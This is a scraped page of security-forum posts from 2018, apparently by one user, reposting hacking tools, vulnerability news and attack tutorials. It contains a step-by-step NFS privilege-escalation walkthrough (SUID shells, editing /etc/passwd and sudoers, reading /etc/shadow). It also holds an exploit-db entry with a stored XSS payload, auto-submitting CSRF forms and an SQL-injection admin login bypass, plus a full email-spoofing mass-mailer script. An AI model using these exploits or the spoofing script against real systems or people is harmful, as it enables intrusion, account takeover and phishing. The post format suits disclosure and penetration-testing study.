Tapioca GUI button to launch the main testing interface. Tapioca Desktop Layout Once you have installed Tapioca, you should end up with a screen like the below. Individual icons may vary slightly across platforms. Browse results Open a file manager to view already-tested applications. Terminal Open a terminal to allow manual execution of scripts. Web Browser Open Chromium web browser. Enable software WiFi AP This button will configure a connected WiFi adapter for HOSTAP mode. This will allow you to wirelessly connect your client device to Tapioca for traffic inspection. Tapioca GUI Launch the main Tapioca interface. Capture all traffic Use tcpdump to capture all raw network traffic without interfering. SSL validation Use mitmproxy to intercept HTTP/HTTPS traffic, using an untrusted root certificate. Any HTTPS traffic that passes through is an indication of a client that isn't validating HTTPS certificates. Full HTTPS inspection Use mitmproxy to intercept HTTP/HTTPS traffic, using a root certificate that has been installed on the client system. This allows full inspection of non-pinned HTTPS traffic. Stop capture Stop any (tcpdump, mitmproxy) capture. Tapioca GUI usage While the Tapioca platform provides buttons to launch individual tests, the Tapioca GUI will provide most of the capabilities that you will need. Tapioca Capture Modes To be able to run all of the reports included with Tapioca, three captures are required.: All traffic with tcpdump In "All traffic with tcpdump" mode, Tapioca doesn't interfere with HTTPS negotiation. This allows Tapioca to inspect the HTTPS handshakes that occur between a client and a server. If a client is using insecure crypto, or protocols other than HTTP/HTTPS, then the tcpdump capture will be required to detect this. This capture is required to allow the Crypto test report to be generated. Verify SSL validation In "Verify SSL validation" mode, Tapioca will intercept web traffic, and the HTTPS communications between the client and Tapioca will use an invalid root CA certificate. Any client that allows HTTPS traffic through Tapioca without warning is vulnerable to malicious interception. Despite the client using HTTPS, it is not receiving the benefits that HTTPS aims to provide. This capture is required to allow the SSL test report to be generated. Full HTTPS inspection In "Full HTTPS inspection" mode, Tapioca will intercept web traffic, and the HTTPS communications between the client and Tapioca will use a valid root CA certificate that has been installed on the client. This allows searching for content in web traffic, even if it has been encrypted with HTTPS. This capture is required to allow Search capabilities within encrypted, but not pinned, network traffic. Strategies for Using Tapioca For each client application being tested, run through the normal operations for using the client while the traffic is being captured in each of the three modes: All traffic with tcpdump Verify SSL validation Full HTTPS inspection At the end of each test, be sure to stop the capture using the Tapioca GUI or by clicking the stop sign icon at the bottom of the screen. Before starting the next test, be sure to terminate the application being tested. An uninstall of the application between tests will ensure thoroughness of the test. For example, some applications install a service that continues to run even after the application is terminated. After traffic is captured in all three modes, press the "Generate reports" button. The SSL test and the Crypto test have PASSED/FAILED statuses. The network connectivity test simply generates a report of hosts contacted. Results for all three tests can be viewed by using the Tapioca GUI. When entering any data into a form, always use the same values. This can allow you to search for your data. For example, if you are presented with a password field, if you always use "passssss" that will allow you to search for that value in the traffic. Manual Execution of Scripts If you are not using the Tapioca GUI, need to troubleshoot problems, or if you would like to run the utilities against existing network captures (e.g. a pcap file), there are command-line utilities: checkcrypto.py - Validate that HTTPS negotiations are secure (pcap required) checknet.py - Enumerate hosts contacted using which protocols, as well as which host names are resolved (pcap required) checkssl.py - Validate that a client is verifying that an SSL certificate is issued by a trusted provider (mitmproxy log file required) search.py - Search for strings in network captures (pcap and/or mitmproxy log file required) Download: tapioca-master.zip git clone https://github.com/CERTCC/tapioca.git Source

May 29, 2018

Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System

Fi8sVrs posted a topic in Cryptocurrency

Security researchers have discovered a severe vulnerability in EOS blockchain platform that could allow remote hackers to take complete control over the node servers that maintain the technology. EOS is an open source smart contract platform, known as 'Blockchain 3.0,' that allows developers to build decentralized applications over blockchain infrastructure, just like Ethereum. Discovered by Chinese security researchers at Qihoo 360—Yuki Chen of Vulcan team and Zhiniang Peng of Core security team—the vulnerability is a buffer out-of-bounds write issue which resides in the function used by nodes server to parse contracts. To achieve remote code execution on a targeted node, all an attacker needs to do is upload a maliciously crafted WASM file (a smart contract) written in WebAssembly to the server. As soon as the vulnerable process parser reads the WASM file, the malicious payload gets executed on the node, which could then also be used to take control over the supernode in EOS network—servers that collect transaction information and pack it into blocks. Once the attackers gained control over the supernode, they could eventually "pack the malicious contract into the new block and further control all nodes of the EOS network." Researchers have detailed how to reproduce the vulnerability and also released a proof-of-concept exploit, along with a video demonstration, which you can watch on their blog post. The pair responsibly reported the vulnerability to the maintainers of the EOS project, and they have already released a fix for the issue on GitHub. Via thehackernews.com

May 29, 2018

SQLi Exploiter - Tool for exploiting SQL injection vulnerabilities that sqlmap can't find.

Fi8sVrs posted a topic in Programe hacking

SQLi Exploiter WARNING: This is not a script kiddie tool! Usage requires detailed knowledge of the vulnerability, a thorough understand of the functionality available in the affected RDBMS, and the ability to write Python. The good news is that it is highly configurable. Born out of a need to exploit SQL injection vulnerabilities that sqlmap just couldn't find. Always try sqlmap first. It is highly customizable and only fails in very complicated injection scenarios. However, when it does fail, use this. Enjoy! - Tim (@lanmaster53) Tomes Getting Started Install the dependencies: pip install -r REQUIREMENTS.txt Edit the config.py file and follow the numbered configuration steps. Run the script: python ./sqli-exploiter.py Developed and tested in Python 3, but may also work in Python 2. I have no idea... Download: sqli-exploiter-master.zip or: git clone https://github.com/lanmaster53/sqli-exploiter.git Source

May 29, 2018

Linux Privilege Escalation using Misconfigured NFS

Fi8sVrs posted a topic in Tutoriale in engleza

After solving several OSCP Challenges we decided to write the article on the various method used for Linux privilege escalation, that could be helpful for our readers in their penetration testing project. In this article, we will learn how to exploit a misconfigured NFS share to gain root access to a remote host machine. Table of contents Introduction of NFS Misconfigured NFS Lab setup Scanning NFS shares Nmap script showmount Exploiting NFS server for Privilege Escalation via: Bash file C program file Nano/vi Obtain shadow file Obtain passwd file Obtain sudoers file Let’s Start!! Network File System (NFS): Network File System permits a user on a client machine to mount the shared files or directories over a network. NFS uses Remote Procedure Calls (RPC) to route requests between clients and servers. Although NFS uses TCP/UDP port 2049 for sharing any files/directories over a network. Misconfigured NFS Lab setup Basically, there are three core configuration files (/etc/exports, /etc/hosts.allow, and /etc/hosts.deny) you will need to configure to set up an NFS server. BUT to configure weak NFS server we will look only /etc/export file. To install NFS service execute below command in your terminal and open /etc/export file for configuration. sudo apt-get update sudo apt install nfs-kernel-server nano /etc/exports The /etc/exports file holds a record for each directory that you expect to share within a network machine. Each record describes how one directory or file is shared. Apply basic syntax for configuration: Directory Host-IP(Option-list) There are various options will define which type of Privilege that machine will have over shared directory. rw: Permit clients to read as well as write access to shared directory. ro: Permit clients to Read-only access to shared directory.. root_squash: This option Prevents file request made by user root on the client machine because NFS shares change the root user to the nfsnobody user, which is an unprivileged user account. no_root_squash: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implication. async: It will speed up transfers but can cause data corruption as NFS server doesn’t wait for the complete write operation to be finished on the stable storage, before replying to the client. sync: The sync option does the inverse of async option where the NFS server will reply to the client only after the data is finally written to the stable storage. Hopefully, it might be clear to you, how to configure the /etc/export file by using a particular option. An NFS system is considered weak or Misconfigured when following entry/record is edit into it for sharing any directory. /home *(rw,no_root_squash) Above entry shows that we have shared /home directory and allowed the root user on the client to access files to read/ write operation and * sign denotes connection from any Host machine. After then restart the service with help of the following command. sudo /etc/init.d/nfs-kernel-server restart Scanning NFS shares Nmap You can take help of Nmap script to scan NFS service in target network because it reveals the name of share directory of target’s system if port 2049 is opened. nmap -sV --script=nfs-showmount 192.168.1.102 Basically nmap exports showmount -e command to identify the shared directory and here we can clearly observe /home * is shared directory for everyone in the network. Showmount The same thing can be done manually by using showmount command but for that install nfs-common package on your local machine with help of the following command. apt-get install nfs-common showmount -e 192.168.1.102 Exploiting NFS server for Privilege Escalation Bash file Now execute below command on your local machine to exploit NFS server for root privilege. mkdir /tmp/raj mount -t nfs 192.168.1.102:/home /tmp/raj cp /bin/bash . chmod +s bash ls -la bash Above command will create a new folder raj inside /tmp and mount shared directory /home inside /tmp/raj. Then upload a local exploit to gain root by copying bin/bash and set suid permission. Use df -h command to get summary of the amount of free disk space on each mounted disk. First, you need to compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh. Now we knew that /home is shared directory, therefore, move inside it and follow below steps to get root access of victim’s machine. cd /home ls ./bash -p id whoami So, it was the first method to pwn the root access with help of bin/bash if NFS system is configured weak. C Program Similarly, we can use C language program file for root privilege escalation. We have generated a C-Program file and copied it into /tmp/raj folder. Since it is c program file therefore first we need to compile it and then set suid permission as done above. cp asroot.c /tmp/root cd /tmp/raj gcc asroot.c -o shell chmod +s shell Now repeat the above process and run shell file to obtained root access. cd /home ls ./shell id whoami So, it was the second method to pwn the root access with help of bin/bash via c-program if NFS system is misconfigured. Nano/Vi Nano and vi editor both are most dangerous applications that can lead to privilege escalation if share directly or indirectly. In our case, it not shared directly but still, we can use any application for exploiting root access. Follow below steps: cp /bin/nano chmod 4777 nano ls -la nano Since we have set suid permission to nano therefore after compromising target’s machine at least once we can escalate root privilege through various techniques. cd /home ls ./nano -p etc/shadow When you will execute above command it will open shadow file, from where you can copy the hash password of any user. Here I have copied hash password of the user: raj in a text file and saved as shadow then use john the ripper to crack that hash password. Awesome!!! It tells raj having password 123. Now either you can login as raj and verify its privilege or follow next step. Passwd file Now we know the password of raj user but we are not sure that raj has root privilege or not, therefore, we can add raj into the root group by editing etc/passwd file. Open the passwd file with help of nano and make following changes ./nano -p etc/passwd raj:x:0:0:,,,:/home/raj:/bin/bash Now use su command to switch user and enter the password found for raj. su raj id whoami Great!!! This was another way to get root access to target’s machine. Sudoers file We can also escalate root privilege by editing sudoers file where we can assign ALL privilege to our non-root user (ignite). Open the sudoers file with help of nano and make following changes ./nano -p etc/sudoers ignite ALL=(ALL:ALL) NOPASSWD: ALL Now use sudo bash command to access root terminal and get root privilege sudo bash id whoami Conclusion: Thus we saw the various approach to escalated root privilege if port 2049 is open for NFS services and server is weak configured. For your practice, you can play with ORCUS which is a vulnerable lab of vulnhub and read the article from here. Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here Source: hackingarticles.in

iOSRestrictionBruteForce - Crack iOS Restriction Passcodes with Python

Fi8sVrs posted a topic in Mobile security

iOS Restriction Passcode Brute Force Overview This version of the application is written in Python, which is used to crack the restriction passcode of an iPhone/iPad takes advantage of a flaw in unencrypted backups allowing the hash and salt to be discovered. DEPENDENCIES This has been tested with Python 2.7 and Python 3.6 Requires Passlib Install with pip install passlib Usage usage: iOSCrack.py [-h] [-a] [-c] [-b folder] [-t] a script to crack the restriction passcode of an iDevice optional arguments: -h, --help show this help message and exit -a, --automatically automatically finds and cracks hashes -c, --cli prompts user for input -b folder, --backup folder where backups are located -t, --test runs unittest How to Use 1. Clone repository git clone https://github.com/thehappydinoa/iOSRestrictionBruteForce && cd iOSRestrictionBruteForce 2. Make sure to use iTunes or libimobiledevice to backup the iOS device to computer 3. Run ioscrack.py with the auto option python ioscrack.py -a How to Test Run ioscrack.py with the test option python ioscrack.py -t How it Works Done by using the pbkdf2 hash with the Passlib python module Trys the top 20 four-digit pins Trys birthdays between 1900-2017 Brute force pins from 1 to 9999 Adds successful pins to local database How to Protect Against Encrpyt backups Backup only on trusted computers Contributing Best ways to contribute Star it on GitHub - if you use it and like it please at least star it Promote Open issues Submit fixes and/or improvements with Pull Requests Promotion Like the project? Please support to ensure continued development going forward: Star this repo on GitHub Follow me Twitter GitHub Acknowledgments yuejd Download: iOSRestrictionBruteForce-master.zip Source

May 28, 2018

Sublist3r

Fi8sVrs replied to ImiDucCuMandrieSteagul's topic in Programe utile

incearca sa dai format, se vede ca naiba pe tema alba

SMTP-Mailer

Fi8sVrs posted a topic in Programe utile

SMTP-Mailer: A python script to send emails using SMTP protocol . Easy way to spoof emails. smtp.py #!/usr/bin/env python # -*- coding: utf-8 -*- import smtplib from email.MIMEMultipart import MIMEMultipart from email.MIMEText import MIMEText def checkConnection(server, port, tls, user, passwd): try: connect = smtplib.SMTP(server, port) connect.ehlo() if tls: connect.starttls() connect.ehlo() connect.login(user, passwd) return connect except: return False def inboxEmail(server, port, tls, user, passwd, maillist, From, subject, mailtext): smtpConnect = checkConnection(server, port, tls, user, passwd) emails = len(maillist) for success, sendto in enumerate(maillist): content = MIMEMultipart() content['From'] = From content['To'] = sendto.rstrip() content['Subject'] = subject htmlscript = mailtext.rstrip() content.attach(MIMEText(htmlscript, 'html')) print('Pr0 SMTP Email Sender >>> You are going to send to '+sendto.rstrip()) smtpConnect.sendmail(From, sendto.rstrip(), content.as_string()) smtpConnect.quit() print('\nBastians Email Sender >>> Email to '+str(success+1)+'/'+str(emails)+' Adresses sended!\n') print""" # _____ __ __ _______ _____ __ __ _ _ # / ____| | \/ | |__ __| | __ \ | \/ | (_) | | # | (___ | \ / | | | | |__) | | \ / | __ _ _ | | ___ _ __ # \___ \ | |\/| | | | | ___/ | |\/| | / _` | | | | | / _ \ | '__| # ____) | | | | | | | | | | | | | | (_| | | | | | | __/ | | # |_____/ |_| |_| |_| |_| |_| |_| \__,_| |_| |_| \___| |_| MOHAMED NOUR """ smtpServer = raw_input('\nPlease enter the SMTP Server (Hostname or IP Adress): ') smtpPort = input('Please enter the SMTP Port : ') smtpTLS = input('Secure the Email with TLS ? (Yes [1] or No [0]): ') smtpUser = raw_input('Enter the SMTP Username: ') smtpPass = raw_input('Enter the SMTP Password: ') if checkConnection(smtpServer, smtpPort, smtpTLS, smtpUser, smtpPass,): print('\nPr0 SMTP Email Sender >>> SMTP Status // Connected!') sendFrom = raw_input('\nEnter the Receiver: ') sendSubj = raw_input('Enter the Subject: ') userlist = raw_input('Enter the Path of the Email List: ') try: maillist = open(userlist).readlines() print('\n Pr0 SMTP Email Sender >>> I found currently '+str(len(maillist))+' Email Adresses.') htmlscript = raw_input('\nEnter here the Path to your HTML Script: ') try: html = open(htmlscript).read() raw_input('ENTER, to send the HTML Script to '+str(len(maillist))+' ...\n') try: inboxEmail(smtpServer, smtpPort, smtpTLS, smtpUser, smtpPass, maillist, sendFrom, sendSubj, html) except: print('ERROR: I CANT USE THE EMAIL!') except: print('The HTML File cannot get readed yet or is empty.') except: print('The .txt File cannot get readed or is empty.') else: print('I cant connect to the Server :/') Source

Terminator : Metasploit Payload Generator

Fi8sVrs posted a topic in Programe hacking

Payload List: Binaries Payloads 1) Android 2) Windows 3) Linux 4) Mac OS Scripting Payloads 1) Python 2) Perl 3) Bash Web Payloads 1) ASP 2) JSP 3) War Encrypters 1) APK Encrypter 2) Python Encrypter The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law. Download: Terminator-master.zip or git clone https://github.com/MohamedNourTN/Terminator.git Mirror: terminator.py Source

May 28, 2018
- 1

Superfood 1.0 - Multiple Vulnerabilities

Fi8sVrs posted a topic in Exploituri

# Exploit Title: Superfood - Restaurants & Online Food Order System 1.0 - Persistent cross site scripting / Cross site request forgery / Admin panel Authentication bypass # Date: 2018-05-20 # Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com # Vendor Homepage: https://codecanyon.net/item/superfood-restaurants-online-food-order-system/16855836?s_rank=30 # Version: 1.0 # Tested on: Kali linux ==================================================== # Description: Superfood - Restaurants & Online Food Order System 1.0 suffers from multiple vulnerabilities : ==================================================== # POC 1 : Persistent cross site scripting : 1) After creating an account , go to your profile. 2) Navigate to "Update profile" and put this payload : "/><script>alert('xss')</script> 3) You will have an alert box in the page . ==================================================== # POC 2 : CSRF : Attacker can change user's authentication directly : # User's CSRF exploit : <html> <head> <title>CSRF POC</title> </head> <body> <form action="http://restaurant.thesoftking.com/updateprofile" method="post"> <input type="hidden" name="name" value="anything"> <input type="hidden" name="mobile" value="1000000000"> <input type="hidden" name="address" value="anything"> </form> <script> document.forms[0].submit(); </script> </body> </html> # Admin page CSRF exploit : <form action="http://restaurant.thesoftking.com/admin/setgeneral.php" method="post"> <input name="name" value="exploit" type="hidden"> <input name="wcmsg" value="test" type="hidden"> <input name="address" value="test2" type="hidden"> <input name="mobile" value="1000000" type="hidden"> <input name="email" value="test@test.com" type="hidden"> <input name="currency" value="decode" type="hidden"> </form> <script> document.forms[0].submit(); </script> ==================================================== # POC 3 : Authentication bypass : # Attacker can bypass admin panel without any authentication : Path : /admin Username : ' or 0=0 # Password : anything ==================================================== Source: exploit-db.com

May 27, 2018

HTTPoxyScan - HTTPoxy Exploit Scanner

Fi8sVrs posted a topic in Programe hacking

HTTPoxy Exploit Scanner by 1N3 @CrowdShield (https://crowdshield.com) Last Updated: 20160720 ABOUT: PoC/Exploit scanner to scan common CGI files on a target URL for the HTTPoxy vulnerability. Httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. For more details, go to https://httpoxy.org. REQUIREMENTS: Requires ncat to establish reverse session USAGE: ./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000 This will scan https://target.com with a list of common CGI files while injecting a Proxy header back to a given IP:PORT. A reverse listener will catch the incoming connection to confirm the remote site is vulnerable. DISCLAIMER: I take no responsibility for wrong doing or misuse of this exploit. Download: HTTPoxyScan-master.zip or: git clone https://github.com/1N3/HTTPoxyScan.git Source

May 27, 2018
- 2

Impunere interval minim intre topicuri

Fi8sVrs replied to Wav3's topic in Sugestii

doua stiri am postat man

salt-scanner - Linux vulnerability scanner based on Salt Open and Vulners audit API, with Slack notifications and JIRA integration

Fi8sVrs posted a topic in Programe utile

salt-scanner Linux vulnerability scanner based on Salt Open and Vulners audit API, with Slack notifications and JIRA integration Features Slack notification and report upload JIRA integration OpsGenie integration Requirements Salt Open 2016.11.x (salt-master, salt-minion)¹ Python 2.7 salt (you may need to install gcc, gcc-c++, python dev) slackclient jira opsgenie-sdk Note: Salt Master and Minion versions should match. Salt-Scanner supports Salt version 2016.11.x. if you are using version 2017.7.x, replace "expr_form" with "tgt_type" in salt-scanner.py. Usage $ ./salt-scanner.py -h ========================================================== Vulnerability scanner based on Vulners API and Salt Open _____ _ _ _____ / ___| | | | / ___| \ `--. __ _| | |_ \ `--. ___ __ _ _ __ _ __ ___ _ __ `--. \/ _` | | __| `--. \/ __/ _` | '_ \| '_ \ / _ \ '__| /\__/ / (_| | | |_ /\__/ / (_| (_| | | | | | | | __/ | \____/ \__,_|_|\__| \____/ \___\__,_|_| |_|_| |_|\___|_| Salt-Scanner 0.1 / by 0x4D31 ========================================================== usage: salt-scanner.py [-h] [-t TARGET_HOSTS] [-tF {glob,list,grain}] [-oN OS_NAME] [-oV OS_VERSION] optional arguments: -h, --help show this help message and exit -t TARGET_HOSTS, --target-hosts TARGET_HOSTS -tF {glob,list,grain}, --target-form {glob,list,grain} -oN OS_NAME, --os-name OS_NAME -oV OS_VERSION, --os-version OS_VERSION $ sudo SLACK_API_TOKEN="EXAMPLETOKEN" ./salt-scanner.py -t "*" ========================================================== Vulnerability scanner based on Vulners API and Salt Open _____ _ _ _____ / ___| | | | / ___| \ `--. __ _| | |_ \ `--. ___ __ _ _ __ _ __ ___ _ __ `--. \/ _` | | __| `--. \/ __/ _` | '_ \| '_ \ / _ \ '__| /\__/ / (_| | | |_ /\__/ / (_| (_| | | | | | | | __/ | \____/ \__,_|_|\__| \____/ \___\__,_|_| |_|_| |_|\___|_| Salt-Scanner 0.1 / by 0x4D31 ========================================================== + No default OS is configured. Detecting OS... + Detected Operating Systems: - OS Name: centos, OS Version: 7 + Getting the Installed Packages... + Started Scanning '10.10.10.55'... - Total Packages: 357 - 6 Vulnerable Packages Found - Severity: Low + Started Scanning '10.10.10.56'... - Total Packages: 392 - 6 Vulnerable Packages Found - Severity: Critical + Finished scanning 2 host (target hosts: '*'). 2 Hosts are vulnerable! + Output file created: 20170622-093138_232826a7-983f-499b-ad96-7b8f1a75c1d7.txt + Full report uploaded to Slack + JIRA Issue created: VM-16 + OpsGenie alert created$ ./salt-scanner.py -h ========================================================== Vulnerability scanner based on Vulners API and Salt Open _____ _ _ _____ / ___| | | | / ___| \ `--. __ _| | |_ \ `--. ___ __ _ _ __ _ __ ___ _ __ `--. \/ _` | | __| `--. \/ __/ _` | '_ \| '_ \ / _ \ '__| /\__/ / (_| | | |_ /\__/ / (_| (_| | | | | | | | __/ | \____/ \__,_|_|\__| \____/ \___\__,_|_| |_|_| |_|\___|_| Salt-Scanner 0.1 / by 0x4D31 ========================================================== usage: salt-scanner.py [-h] [-t TARGET_HOSTS] [-tF {glob,list,grain}] [-oN OS_NAME] [-oV OS_VERSION] optional arguments: -h, --help show this help message and exit -t TARGET_HOSTS, --target-hosts TARGET_HOSTS -tF {glob,list,grain}, --target-form {glob,list,grain} -oN OS_NAME, --os-name OS_NAME -oV OS_VERSION, --os-version OS_VERSION $ sudo SLACK_API_TOKEN="EXAMPLETOKEN" ./salt-scanner.py -t "*" ========================================================== Vulnerability scanner based on Vulners API and Salt Open _____ _ _ _____ / ___| | | | / ___| \ `--. __ _| | |_ \ `--. ___ __ _ _ __ _ __ ___ _ __ `--. \/ _` | | __| `--. \/ __/ _` | '_ \| '_ \ / _ \ '__| /\__/ / (_| | | |_ /\__/ / (_| (_| | | | | | | | __/ | \____/ \__,_|_|\__| \____/ \___\__,_|_| |_|_| |_|\___|_| Salt-Scanner 0.1 / by 0x4D31 ========================================================== + No default OS is configured. Detecting OS... + Detected Operating Systems: - OS Name: centos, OS Version: 7 + Getting the Installed Packages... + Started Scanning '10.10.10.55'... - Total Packages: 357 - 6 Vulnerable Packages Found - Severity: Low + Started Scanning '10.10.10.56'... - Total Packages: 392 - 6 Vulnerable Packages Found - Severity: Critical + Finished scanning 2 host (target hosts: '*'). 2 Hosts are vulnerable! + Output file created: 20170622-093138_232826a7-983f-499b-ad96-7b8f1a75c1d7.txt + Full report uploaded to Slack + JIRA Issue created: VM-16 + OpsGenie alert created You can also use Salt Grains such as ec2_tags in target_hosts: $ sudo ./salt-scanner.py --target-hosts "ec2_tags:Role:webapp" --target-form grain Slack Alert TODO Clean up the code and add some error handling Use Salt Grains for getting the OS info and installed packages [1] Salt in 10 Minutes: https://docs.saltstack.com/en/latest/topics/tutorials/walkthrough.html Download: salt-scanner-master.zip or: git clone https://github.com/0x4D31/salt-scanner.git Source

May 26, 2018
- 1

TalkTalk Router - WPS Exploit

Fi8sVrs posted a topic in Wireless Pentesting

Purpose of this Article This article demonstrates a vulnerability found in the 'Super Router' router provided by the internet service provider TalkTalk to its customers. The vulnerability discovered allows the attacker to discover the Super Router's WiFi Password by attacking the WPS feature in the router which is always switched on, even if the WPS pairing button is not used. The purpose of this article is to encourage TalkTalk to immediately patch this vulnerability in order to protect their customers. Tools Used Windows Based Computer (Other tools on unix platforms may be just as effective, but for the purpose of this article we will focus on one) Wireless Network Adapter TalkTalk Router within Wireless Network Adapter Range Software 'Dumpper' available on Sourceforge (Tested with v.91.2) Steps to Reproduce Step 1: Run Dumpper and navigate to the WPS tab and select the target WiFi BSSID. Step 2: Click 'WpsWin' to begin probing the BSSID for the WPS pin. Step 3: After a couple of seconds, the WiFi access key to this network will be displayed bottom right. Scale of Vulnerability This method has proven successful on multiple TalkTalk Super Routers belonging to consenting parties which is enough to suggest that this vulnerability affects all TalkTalk Super Routers of this particular model/version. TalkTalk have been notified of this vulnerability in the past and have failed to patch it many years later. It is also documented across various community forums. Links: 2014 TalkTalk Forum Post: D-Link RT2860 [Security issue] 2014 BroadbandBanter Forum Post: TalkTalk DSL-3680 WPS security vulnerability 2016 Hashkiller Forum Post: WPA Packet Cracking - TalkTalk Disclosure TalkTalk have been notified of this vulnerability on the day of the article being written (21 May 2018) Typically a 30 day period from discovery to public release would be granted. However, in this case, as TalkTalk were made aware of this exploit back in 2014, public release is immediate. Date Disclosure 21 May 2018 Delivered to TalkTalk. 21 May 2018 Date of public release. Reference: https://securityaffairs.co/wordpress/72805/laws-and-regulations/talktalk-super-routers-flaws.html Source: https://www.indigofuzz.com/article.php?docid=talktalk1430

May 25, 2018
- 1

Sandmap - Network and System Reconnaissance Tool

Fi8sVrs posted a topic in Programe utile

Sandmap is a tool supporting network and system reconnaissance using the massive Nmap engine. It provides a user-friendly interface, automates and speeds up scanning and allows you to easily use many advanced scanning techniques. Description Sandmap is a tool supporting network and system reconnaissance using the massive Nmap engine. It provides a user-friendly interface, automates and speeds up scanning and allows you to easily use many advanced scanning techniques. Key Features simple CLI with the ability to run pure Nmap engine predefined scans included in the modules support Nmap Scripting Engine (NSE) with scripts arguments TOR support (with proxychains) multiple scans at one time at this point: 31 modules with 459 scan profiles How To Use It's simple: # Clone this repository git clone --recursive https://github.com/trimstray/sandmap # Go into the repository cd sandmap # Install ./setup.sh install # Run the app sandmap symlink to bin/sandmap is placed in /usr/local/bin man page is placed in /usr/local/man/man8 Command Line Before using the Sandmap read the Command Line introduction. Configuration The etc/main.cfg configuration file has the following structure: # shellcheck shell=bash # Specifies the default destination. # Examples: # - dest="127.0.0.1,8.8.8.8" dest="127.0.0.1" # Specifies the extended Nmap parameters. # Examples: # - params="--script ssl-ccs-injection -p 443" params="" # Specifies the default output type and path. # Examples: # - report="xml" report="" # Specifies the TOR connection. # Examples: # - tor="true" tor="" # Specifies the terminal type. # Examples: # - terminal="internal" terminal="internal" Requirements Sandmap uses external utilities to be installed before running: nmap xterm proxychains This tool working with: GNU/Linux or BSD (testing on Debian, CentOS and FreeBSD) Bash (testing on 4.4.19) Nmap (testing on 7.70) Also you will need root access. Other Modules Available modules: 31 Available scan profiles: 459 Contributing See this. Download: sandmap-master.zip or: git clone https://github.com/trimstray/sandmap.git Source

May 25, 2018

Aww Ship! Navigating the vulnerabilities and attack surface of the maritime industry John Sonnenschein

Fi8sVrs posted a topic in Tutoriale video

The majority of the modern economy's logistics is implemented via shipping vessels controlled through systems that embody a combination of the worst parts of a corporate network, ICS, and embedded systems. These systems were largely designed decades ago and are rarely, if ever, updated - yet are exposed to a large number of attack surfaces on the internet and via radio-frequency attacks. This talk will cover the protocols used by the commonly implemented systems found in both commercial and private maritime vessels - including large capacity tankers and container ships - and the shoreside infrastructure used to communicate with, and issue commands to, the shipboard systems. We will see how this infrastructure can be attacked, and how it in turn can be used to carry out significant attacks that could cause major disruption to the world's economy. Recorded at NolaCon 2018

Windows Packer Project for Defenders: DARKSURGEON

Fi8sVrs posted a topic in Programe securitate

DARKSURGEON is a Windows packer project to empower incident response, digital forensics, malware analysis, and network defense. https://darksurgeon.io Darksurgeon is a Windows packer project to empower incident response, digital forensics, malware analysis, and network defense. Darksurgeon has three stated goals: Accelerate incident response, digital forensics, malware analysis, and network defense with a preconfigured Windows 10 environment complete with tools, scripts, and utilities. Provide a framework for defenders to customize and deploy their own programmatically-built Windows images using Packer and Vagrant. Reduce the amount of latent telemetry collection, minimize error reporting, and provide reasonable privacy and hardening standards for Windows 10. If you haven’t worked with packer before, this project has a simple premise: Provide all the tools you need to have a productive, secure, and private Windows virtual machine so you can spend less time tweaking your environment and more time fighting bad guys. Please note this is an alpha project and it will be subject to continual development, updates, and package breakage. Development Principles Darksurgeon is based on a few key development principles: Modularity is key. Each component of the installation and configuration process should be modular. This allows for individuals to tailor their packer image in the most flexible way. Builds must be atomic. A packer build should either complete all configuration and installation tasks without errors, or it should fail. A packer image with missing tools is a failure scenario. Hardened out of the box. To the extent that it will not interfere with investigative workflows, all settings related to proactive hardening and security controls should be enabled. Further information on Darksurgeon security can be found later in this post. Instrumented out of the box. To the extent that it will not interfere with investigative workflows, Microsoft Sysmon, Windows Event Logging, and osquery will provide detailed telemetry on host behavior without further configuration. Private out of the box. To the extent that it will not interfere with investigative workflows, all settings related to privacy, Windows telemetry, and error reporting should minimize collection. Building Darksurgeon Build Process Darksurgeon is built using the HashiCorp application packer. The total build time for a new instance of Darksurgeon is around 2–3 hours. Packer creates a new virtual machine using theDarksurgeon JSON file and your hypervisor of choice (e.g. Hyper-V, Virtualbox, VMWare). The answers.iso file is mounted inside theDarksurgeon VM along with the Windows ISO. The answers.iso file contains the unattend.xml needed for a touchless installation of windows, as well as a powershell script to configure Windows Remote Management (winrm). Packer connects to the Darksurgeon VM using WinRM and copies over all files in the helper-scripts and configuration-files directory to the host. Packer performs serial installations of each of the configured powershell scripts, performing occasional reboots as needed. When complete, packer performs a sysprep, shuts down the virtual machine, and creates a vagrant box file. Additional outputs may be specified in the post-processors section of the JSON file. Setup Note: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming. Install packer, vagrant, and your preferred hypervisor on your host. Download the repository contents to your host. Download a Windows 10 Enterprise Evaluation ISO (1803). Move the ISO file to your local Darksurgeon repository. Update Darksurgeon.json with the ISO SHA1 hash and file name. (Optional) Execute the powershell script New-Darksurgeon.ps1 to generate a new answers.iso file. There is an answers ISO file included in the repository but you may re-build this if you don’t trust it, or you would like to modify the unattend files: powershell.exe New-DARKSURGEONISO.ps1 Build the recipe using packer: packer build -only=[hyperv-iso|vmware|virtualbox] .\DARKSURGEON.json Using Darksurgeon Note: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming. Once Darksurgeon has successfully built, you’ll receive an output vagrant box file. The box file contains the virtual machine image and vagrant metadata, allowing you to quickly spin up a virtual machine as needed. Install vagrant and your preferred hypervisor on your host. Navigate to the Darksurgeon repository (or the location where you’ve saved the Darksurgeon box file). Perform a vagrant up: vagrant up Vagrant will now extract the virtual machine image from the box file, read the metadata, and create a new VM for you. Want to kill this VM and get a new one? Easy, just perform the following: vagrant destroy && vagrant up Once the Darksurgeon virtual machine is running, you can login using one of the two local accounts: Note: These are default accounts with default credentials. You may want to consider changing the credentials in your packer build. Administrator Account: Username: Darksurgeon Password: darksurgeon Local User Account: Username: Unprivileged Password: unprivileged If you’d rather not use vagrant, you can either import the VM image manually, or look at one of the many other post-processor options provided by packer. Download: DARKSURGEON-master.zip Sources: https://github.com/cryps1s/DARKSURGEON https://darksurgeon.io

May 25, 2018
- 1

Noul regulament pentru protecția datelor a intrat în vigoare în UE. În România, legea abia a fost votată de parlamentari

Fi8sVrs posted a topic in Stiri securitate

